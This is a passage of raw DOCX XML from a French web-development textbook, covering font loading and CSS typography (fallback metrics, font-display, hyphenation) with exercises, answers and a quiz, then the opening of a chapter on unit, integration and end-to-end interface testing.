              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Justification</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Non recommandée à l'écran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rivières blanches</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre détails typographiques · css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Ne pas confondre espacement et justification */</w:t>
        <w:br/>
        <w:t>.texte-justifie {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  text-align: justify;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  text-align-last: left;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  hyphens: auto;            /* indispensable pour éviter les trous */</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Substituer des chiffres tabulaires dans un tableau */</w:t>
        <w:br/>
        <w:t>.chiffres { font-variant-numeric: tabular-nums; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Petites capitales réelles plutôt que simulées */</w:t>
        <w:br/>
        <w:t>.petites-caps { font-variant-caps: all-small-caps; }</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CHARGER DES POLICES SANS CASSER LA PAGE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Une police pour le texte, une pour les titres, pas plus.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Sous-ensembles et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>unicode-range</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour alléger.</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font-display: swap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour le corps, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>optional</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour le décor.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Précharger au maximum deux fichiers.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Ajuster </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>size-adjust</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour limiter le décalage.</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woff2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est le format de référence.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font-display</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> décide de la visibilité pendant le chargement.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police de repli aux mauvaises métriques provoque un décalage.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size-adjust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ascent-override</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> corrigent ce décalage.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police variable couvre plusieurs graisses en un fichier.</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axes propriétaires ne s'interpolent pas.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ligne de 45 à 75 caractères reste confortable.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justification à l'écran exige la césure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le texte est soigné. Le chapitre suivant vérifie que l'interface fonctionne vraiment.</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43.1 — Déclarer une police avec repli ajusté</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La police Inter doit remplacer Arial sans décalage visible.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Déclarez la police.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Ajoutez une famille de repli.</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Ajustez la taille.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 43.2 — Mesurer l'impact d'une police</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   PERFORMANCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le titre principal provoque un décalage visible au chargement.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Préchargez le fichier.</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 xml:space="preserve">Passez en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>optional</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Comparez la métrique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 43.3 — Corriger une typographie d'article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Les paragraphes sont trop larges et justifiés sans césure.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Limitez la mesure.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Activez la césure.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Équilibrez les titres.</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43.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>@font-face {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-family: "Inter";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  src: url("/polices/inter-var.woff2") format("woff2");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-weight: 100 900;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-display: swap;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@font-face {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-family: "Inter-fallback";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  src: local("Arial");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  size-adjust: 107%;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ascent-override: 90%;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  descent-override: 22%;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  line-gap-override: 0%;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>body { font-family: "Inter", "Inter-fallback", system-ui, sans-serif; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La famille de repli doit être déclarée avant utilisation dans la pile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les pourcentages se mesurent en comparant les hauteurs de ligne des deux polices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 43.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&lt;link rel="preload" href="/polices/titre.woff2" as="font"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      type="font/woff2" crossorigin&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;style&gt;</w:t>
        <w:br/>
        <w:t>@font-face {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-family: "Titre";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  src: url("/polices/titre.woff2") format("woff2");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-display: optional;   /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pas de bascule si le fichier est lent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>optional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite complètement la bascule : la police est utilisée si elle arrive dans la fenêtre initiale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le préchargement réduit fortement le risque de bascule.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 43.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.article p {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  max-inline-size: 68ch;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  line-height: 1.6;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  text-align: justify;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  hyphens: auto;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  text-wrap: pretty;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.article h2 { text-wrap: balance; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>@media (max-width: 40rem) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .article p { text-align: left; }   /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> la justification fatigue sur mobile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sur petit écran, la justification crée des trous : revenez à l'alignement à gauche.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>text-wrap: pretty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> réduit les lignes orphelines en fin de paragraphe.</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 format de police est recommandé pour le Web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TTF</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WOFF2</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OTF</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EOT</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>font-display: swap</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Masque le texte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Affiche le repli immédiatement</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Bloque le rendu</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Charge en arrière-plan</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 xml:space="preserve">À quoi sert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>size-adjust</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Réduire le poids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Aligner les métriques du repli</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Changer la graisse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Précharger</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Quelle longueur de ligne est confortable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20 à 30 caractères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45 à 75 caractères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90 à 120 caractères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Peu importe</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 xml:space="preserve">Que ne permet pas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>font-variation-settings</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Choisir un axe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Interpoler une transition CSS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Régler une graisse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Régler une inclinaison</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Compressé et pris en charge partout.</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Le texte est lisible tout de suite, puis la police remplace le repli.</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Il limite le décalage lors de la substitution.</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Au-delà, l'œil perd le début de la ligne suivante.</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Les axes personnalisés ne s'interpolent pas en transition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>44. Tester une interface : unité, intégration et bout en bout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Écrire des tests qui échouent quand l'interface casse, et qui ne cassent pas quand elle évolue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Intermédiaire · Prérequis : chapitre 43</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Choisir le niveau de test adapté.</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Écrire un test unitaire utile.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Tester un composant par son interface visible.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Automatiser un parcours dans un navigateur.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Éviter les tests fragiles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>44.1 Trois niveaux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un test unitaire vérifie une fonction isolée ; un test d'intégration vérifie plusieurs unités ensemble ; un test de bout en bout traverse l'application dans un vrai navigateur. Le coût croît avec le niveau, la confiance aussi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.148 — Quatre niveaux</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212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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Portée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="222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Vitesse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="222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Fragilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2121"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Unitaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2439"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une fonction, un module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2227"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Millisecondes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2227"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="212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Intégration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Composant et ses voisins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="222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Dizaines de ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="222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Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2121"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bout en bout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2439"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Parcours utilisateur complet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2227"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secondes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2227"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élevée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="212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Visuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Rendu comparé à une référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="222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Secondes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="222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Très élevée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PYRAMIDE DES TESTS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
